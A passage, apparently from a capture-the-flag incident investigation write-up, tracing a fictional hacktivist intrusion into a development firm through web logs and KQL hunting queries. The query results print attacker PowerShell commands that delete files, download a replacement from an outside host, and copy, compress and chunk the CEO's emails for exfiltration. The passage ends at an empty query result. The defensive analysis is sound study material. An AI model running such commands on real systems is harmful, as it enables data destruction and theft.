2024-06-20 10:33:13.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DCorporate%2Bconspiracy%2Btheories https:framtidxdevcorp.com/search 200
2024-06-20 10:33:47.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DVillainous%2Bplans%2Band%2Bplots https:framtidxdevcorp.com/search 200
2024-06-20 10:34:43.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DSecret%2Blaboratories https:framtidxdevcorp.com/search 200
2024-06-20 10:34:57.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DHidden%2Bcameras%2Bin%2Bthe%2Boffice https:framtidxdevcorp.com/search 200
2024-06-20 10:35:51.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DSurveillance%2Bfootage https:framtidxdevcorp.com/search 200
2024-06-20 10:36:31.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DClassified%2Binformation https:framtidxdevcorp.com/search 200
2024-06-20 10:37:03.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DDirty%2Blaundry%2Bof%2Bthe%2Bexecutives https:framtidxdevcorp.com/search 200
2024-06-20 10:37:16.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DEmployee%2Bblackmail%2Bincidents https:framtidxdevcorp.com/search 200
2024-06-20 10:37:44.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DRansom%2Bnotes%2Bfound https:framtidxdevcorp.com/search 200
2024-06-20 10:38:15.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DWho%2Bis%2Bthe%2Bevil%2Bmastermind%253F https:framtidxdevcorp.com/search 200
2024-06-20 10:38:57.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/search%3DCompany%2527s%2Bties%2Bto%2Bthe%2Bdark%2Bweb https:framtidxdevcorp.com/search 200
2024-06-20 10:39:21.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/about-us https://www.linkedin.com 200
2024-06-20 10:39:58.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/contact https://www.linkedin.com 200
2024-06-20 10:40:16.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/leadership https://www.linkedin.com 200
2024-06-20 10:40:51.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/leadership/johanna-karlsson https://www.linkedin.com 200
2024-06-20 10:41:07.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/leadership/team https://www.linkedin.com 200
2024-06-20 10:41:39.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/leadership/evil-masterminds https://www.linkedin.com 200
2024-06-20 10:41:41.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/projects https://www.linkedin.com 200
2024-06-20 10:42:28.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/projects/current https://www.linkedin.com 200
2024-06-20 10:42:46.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/projects/new-mall https://www.linkedin.com 200
2024-06-20 10:42:53.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/projects/secret https://www.findevilcorps.net 200
2024-06-20 10:43:15.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/projects/marshland-exploitation https://www.findevilcorps.net 200
2024-06-20 10:44:11.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/projects/world-domination https://www.findevilcorps.net 200
2024-06-20 10:44:50.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/news https://www.findevilcorps.net 200
2024-06-20 10:45:35.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/news/press-releases https://www.findevilcorps.net 200
2024-06-20 10:45:50.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/news/internal-updates https://www.findevilcorps.net 200
2024-06-20 10:46:38.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/news/articles/new-mall-project-ahead-of-schedule https://www.valdoriantimes.com 200
2024-06-20 10:46:56.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/news/articles/marshland-exploitation-benefits https://www.valdoriantimes.com 200
2024-06-20 10:46:59.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/news/articles/ceo-interview-johanna-karlsson https://www.valdoriantimes.com 200
2024-06-20 10:47:23.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/news/articles/meet-our-it-admins https://www.valdoriantimes.com 200
2024-06-20 10:48:14.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/news/articles/why-frogs-don%27t-matter https://www.valdoriantimes.com 200
2024-06-20 10:48:21.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/news/articles/refill-the-swamp https://www.valdoriantimes.com 200
2024-06-20 10:48:29.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/careers https://www.valdorianjobs.com 200
2024-06-20 11:34:29.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/careers/opportunities https://www.valdorianjobs.com 200
2024-06-20 12:05:29.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/careers/team https://www.valdorianjobs.com 200
2024-06-20 12:09:29.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/careers/become-a-minion https://www.valdorianjobs.com 200
2024-06-20 12:46:29.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/blog https://www.valdorianjobs.com 200
2024-06-20 13:14:29.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/blog/company-updates https://www.valdorianjobs.com 200
2024-06-20 13:34:29.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/blog/posts/behind-the-scenes-it-department https://www.valdorianjobs.com 200
2024-06-20 14:02:29.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/blog/posts/interview-with-johanna-karlsson https://www.valdorianjobs.com 200
2024-06-20 14:06:29.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/blog/posts/future-projects-and-developments https://www.valdorianjobs.com 200
2024-06-20 14:20:29.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/blog/posts/how-to-hide-your-evil-plans https://www.valdorianjobs.com 200
2024-06-21 10:29:56.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/documents https://microsoftonline.com 200
2024-06-21 10:30:47.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/emails https://msn.com 200
2024-06-21 10:31:41.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/architectural_plans https://linkedin.com 200
2024-06-21 10:32:18.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/it_infrastructure https://pinterest.com 200
2024-06-21 11:11:44.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/documents https://duckduckgo.com 200
2024-06-21 11:11:51.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/emails https://discord.com 200
2024-06-21 11:11:53.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/architectural_plans https://sharepoint.com 200
2024-06-21 11:12:25.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/it_infrastructure https://duckduckgo.com 200
2024-06-21 11:29:30.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/documents https://duckduckgo.com 200
2024-06-21 11:29:39.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/emails https://fandom.com 200
2024-06-21 11:30:28.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/architectural_plans https://openai.com 200
2024-06-21 11:30:37.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/it_infrastructure https://okta.com 200
2024-06-21 12:14:51.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/documents https://duosecurity.com 200
2024-06-21 12:15:49.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/emails https://wikipedia.org 200
2024-06-21 12:15:53.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/architectural_plans https://instagram.com 200
2024-06-21 12:15:58.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/it_infrastructure https://google.com 200
2024-06-21 12:37:07.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/documents https://duosecurity.com 200
2024-06-21 12:37:54.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/emails https://linktr.ee 200
2024-06-21 12:38:14.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/architectural_plans https://microsoft.com 200
2024-06-21 12:38:28.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/it_infrastructure https://wikipedia.org 200
2024-06-21 12:48:26.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/documents https://twitch.tv 200
2024-06-21 12:48:42.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/emails https://google.com 200
2024-06-21 12:49:27.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/architectural_plans https://ebay.com 200
2024-06-21 12:50:18.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/it_infrastructure https://t.co 200
2024-06-21 13:46:57.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/documents https://twitch.tv 200
2024-06-21 13:47:47.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/emails https://discord.com 200
2024-06-21 13:48:27.0000 GET 239.72.6.37 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/architectural_plans https://duckduckgo.com 200
2024-06-21 13:48:43.0000 GET 239.72.6.38 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.6.20) Gecko/2022-06-30 19:57:20 Firefox/3.6.11 https://framtidxdevcorp.com/internal/it_infrastructure https://facebook.com 200

There are quite a lot of results; the first batch of queries--dating to 2024-06-20--are all about looking for controversies regarding FramtidX's activities, including damage against local frog populations, alleged shady deals, alleged offshore accounts, alleged briberies, any whistleblower incidents, etcetera. They also looked for ways to contact FramtidX's IT staff, if there exists a public-facing employee email directory, how to contact developers, if there are any public-facing internal document repositories, IT infrastructure details, any existing backdoors in FramtidX's IT infrastructure, etcetera. They also browsed the "about us" and specific employee pages, such as CEO Johanna Karlsson's, current and historic projects, press releases, the careers page, an article about FramtidX's IT team, etcetera.

The next day, they accessed internal directories containing emails, documents, architectural plans, and IT architecture. Interestingly, the refferers for these accesses include popular social media websites, OpenAI, common search engines, and services such as valdoriantimes.com, valdorianjobs.com and findevilcorps.net; the most frequent external refferer is valdorianjobs.com, followed by linkedin.com. At this time, they had access to Developer Alex Johnson's account; before following on that, I'd like to confirm what--if anything--the threat actor did on the chief architects' devices.

Employees
| where role =~ "chief architect"
| distinct hostname
| lookup ProcessEvents on $left.hostname == $right.hostname
| where timestamp >= datetime(2024-06-27 10:35:54.0000) //when Erik got compromised (Sofia was shortly after)
and process_commandline !contains ("WindowsApps")
and process_commandline !contains ("SystemApps")
| sort by hostname, timestamp asc 
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
hostname timestamp parent_process_name parent_process_hash process_commandline process_name process_hash username
VJVS-MACHINE 2024-07-09 15:58:46.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Remove-Item C:\Users\solindgren\Documents\SuperImportantMallProjectArchitecturalPlans.docx powershell.exe d1ed187d85902d679e2926303c291bfa391aa1b4e32b59ae744fbf4ff892f554 solindgren
VJVS-MACHINE 2024-07-10 12:50:15.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Invoke-WebRequest -Uri https://newdevelopmentupdates.org/fake_plans.docx -OutFile C:\Users\solindgren\Documents\fake_plans.docx powershell.exe 39d2fa1fba52e8cc137c5947672cf150632443b9cd196d3ad7240cfd92923d43 solindgren
VJVS-MACHINE 2024-07-10 13:43:15.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Rename-Item -Path C:\Users\solindgren\Documents\fake_plans.docx -NewName SuperImportantMallProjectArchitecturalPlans.docx powershell.exe 0a43dc1485830d568cdf63d557fbffe4c6f188ec2e95e54ff3d419d6a7589501 solindgren
LRJP-DESKTOP 2024-07-09 14:23:50.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Remove-Item C:\Users\erbjorn\Documents\SuperImportantMallProjectArchitecturalPlans.docx powershell.exe e3f9d770e6c24534e68c3084f0d7f3ceaaaf7991a624736aa0636f4819a0eeb4 erbjorn
LRJP-DESKTOP 2024-07-09 14:39:50.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Invoke-WebRequest -Uri https://newdevelopmentupdates.org/fake_plans.docx -OutFile C:\Users\erbjorn\Documents\fake_plans.docx powershell.exe debdcab77ca53b6b441c2debf37a60a74cd982cb889441917a0303daf6273f3d erbjorn
LRJP-DESKTOP 2024-07-09 15:22:50.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Rename-Item -Path C:\Users\erbjorn\Documents\fake_plans.docx -NewName SuperImportantMallProjectArchitecturalPlans.docx powershell.exe 9d2c8d40ffcb5db6c9c91b1725ec44bf46f943f2fb0bc15c13f31c762657b8bc erbjorn

On both their devices, the threat actors deleted the file SuperImportantMallProjectArchitecturalPlans.docx and replaced it with a dummy file originally named fake_plans.docx; they renamed it the same as the original file. If there were no backups in place, the file has been lost; this is an example of data manipulation [MITRE ATT&CK].

Last but not least, the CEO, Johanna Karlsson was also compromised--certainly a valuable target for Shadow Truth, whom specifically looked for information on her during their recon (see [12])--I will take the time to explore what they could've done inside her mailbox and devices in the next section.

Section 4 - Nope, it’s a full on frognado!!!! 🐸πŸŒͺ️😱

As seen in [9], CEO Johanna Karlsson was among the FramtidX employees targeted by a spearphishing campaign that used Developer Alex Johnson's email account, thus bypassing any security measures meant to protect against suspicious external emails. Prompted with an allegedly urgent security update and given a link to a fake login page, Johanna Karlsson had her credentials compromised on 2024-06-26 at 14:34:22 in the afternoon; on 2024-06-27 at 12:40:59 in the afternoon, the threat actors--using IP address 239.72.6.38--successfully logged into Johanna's computer. To check what they could've done on it, I use:

Employees
| where role =~ "ceo"
| distinct hostname
| lookup ProcessEvents on $left.hostname == $right.hostname
| where timestamp >= datetime(2024-06-27 12:40:59.0000) //when Johanna got compromised
and process_commandline !contains ("WindowsApps")
and process_commandline !contains ("SystemApps")
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
hostname timestamp parent_process_name parent_process_hash process_commandline process_name process_hash username
BLVR-MACHINE 2024-07-06 14:00:56.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Get-ChildItem -Path C:\Users\jokarlsson\Documents\Emails\* -Include *.eml, *.msg -Recurse | Copy-Item -Destination C:\Users\jokarlsson\Documents\StolenEmails\ powershell.exe ce2672cb7833453f62ceec169314d4210d567cb641c20bd803c8005e93473b1d jokarlsson
BLVR-MACHINE 2024-07-08 14:14:56.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Compress-Archive -Path C:\Users\jokarlsson\Documents\StolenEmails\* -DestinationPath C:\Users\jokarlsson\Documents\StolenEmails.zip powershell.exe 765439ec946dc54439925f11cecb396fa668ffc4cb52caec70ba691c3d886386 jokarlsson
BLVR-MACHINE 2024-07-08 14:41:47.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f $emails = Get-ChildItem -Path C:\\Users\\jokarlsson\\Documents\\q\\*.eml; $chunks = [System.Collections.Generic.List[System.Collections.Generic.List[System.IO.FileInfo]]]::new(); $chunkSize = 10; for ($i = 0; $i -lt $emails.Count; $i += $chunkSize) { $chunks.Add($emails[$i..($i + $chunkSize - 1)]); } foreach ($chunk in $chunks) { $chunk | Compress-Archive -DestinationPath "C:\\Users\\jokarlsson\\Documents\\Chunk$($chunks.IndexOf($chunk)).zip"; } powershell.exe 02efe9042352c43b4c94cf5d5995cc32e09c8ca3f5a0ab7b6483c75ff190f05d jokarlsson

The threat actors recursively seek any and all .eml (email file format, follows RFC 822) and .msg (Microsoft Outlook's proprietary email format) files in Johanna's email backups; the found emails are then copied to the StolenEmails staging folder and compressed into the StolenEmails.zip archive; all .eml files specifically are compressed into a series of archives containing 10 emails each. The full command is pasted below for clarity:

$emails = Get-ChildItem -Path C:\\Users\\jokarlsson\\Documents\\q\\*.eml;
$chunks = [System.Collections.Generic.List[System.Collections.Generic.List[System.IO.FileInfo]]]::new();
$chunkSize = 10;
for ($i = 0; $i -lt $emails.Count; $i += $chunkSize) {
  $chunks.Add($emails[$i..($i + $chunkSize - 1)]);
}
foreach ($chunk in $chunks) {
  $chunk | Compress-Archive -DestinationPath "C:\\Users\\jokarlsson\\Documents\\Chunk$($chunks.IndexOf($chunk)).zip";
}

Since there are no hints of the threat actors using more sophisticated methods, such as exfiltrating the files directly via cURL or similar software, it's possible they used Johanna's email account. First, I'll check what emails might've been exfiltrated from Johanna's backups, given the threat actor's interests (regarding environmental conservation, alleged financial and political corruption, etcetera.):

Employees
| where role =~ "ceo"
| distinct email_addr
| lookup Email on $left.email_addr == $right.sender
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
timestamp sender reply_to recipient subject verdict link
2024-06-21 10:52:09.0000 erik.stevens@valdoriapublicworks.gov erik.stevens@valdoriapublicworks.gov johanna_karlsson@framtidxdevcorp.com RE: Proposal for New Mall Development CLEAN
2024-06-24 10:02:14.0000 johanna_karlsson@framtidxdevcorp.com johanna_karlsson@framtidxdevcorp.com erik.stevens@valdoriapublicworks.gov RE: Proposal for New Mall Development CLEAN
2024-06-24 13:02:14.0000 erik.stevens@valdoriapublicworks.gov erik.stevens@valdoriapublicworks.gov johanna_karlsson@framtidxdevcorp.com We're going to make so much freaking money! CLEAN
2024-06-25 10:58:49.0000 johanna_karlsson@framtidxdevcorp.com johanna_karlsson@framtidxdevcorp.com erik.stevens@valdoriapublicworks.gov Invite for rich people big boat party! CLEAN
2024-06-26 12:10:20.0000 erik.stevens@valdoriapublicworks.gov erik.stevens@valdoriapublicworks.gov johanna_karlsson@framtidxdevcorp.com RE: Next Steps CLEAN
2024-06-26 13:10:20.0000 johanna_karlsson@framtidxdevcorp.com johanna_karlsson@framtidxdevcorp.com erik.stevens@valdoriapublicworks.gov RE: Next Steps CLEAN https://www.whyyoushoudntcareaboutnature.com

Evidently, the threat actors found sensitive, controversial information regarding FramtidX's latest development project. Given their hacktivist nature and that they did not ask for a ransom (for example), it's possible these emails were leaked to an interested third party.

Searching for emails sent by Johanna Karlsson (johanna_karlsson@framtidxdevcorp.com) doesn't lead to any hints, and neither does checking the rest of the compromised employees (see [9] for a list of said employees). Perhaps there is some sort of internal email address(es) not associated to FramtidX employees (i.e. not firstname_lastname@framtidxdevcorp.com) that the threat actors' could've also used and that shared credentials with one (or more) of the compromised employee credentials. To check for this, I use:

let employee_emails =
Employees
| distinct email_addr;
Email
| where sender endswith "framtidxdevcorp.com"
and timestamp >= datetime(2024-06-27 12:40:59.0000)
and recipient !endswith "framtidxdevcorp.com"
and sender !in (employee_emails)
| distinct sender
Query Results
sender
server_admin@framtidxdevcorp.com
ceo@framtidxdevcorp.com

And to check what, if anything, these addresses could've sent to non-FramtidX persons, I used:

let employee_emails =
Employees
| distinct email_addr;
Email
| where sender endswith "framtidxdevcorp.com"
and timestamp >= datetime(2024-06-27 12:40:59.0000) //threat actor logs into CEO device
and recipient !endswith "framtidxdevcorp.com"
and sender !in (employee_emails)
| distinct sender
| lookup Email on $left.sender == $right.sender
| where recipient !endswith "framtidxdevcorp.com"
and timestamp >= datetime(2024-07-06 14:00:56.0000) //first command run on CEO's device
Query Results
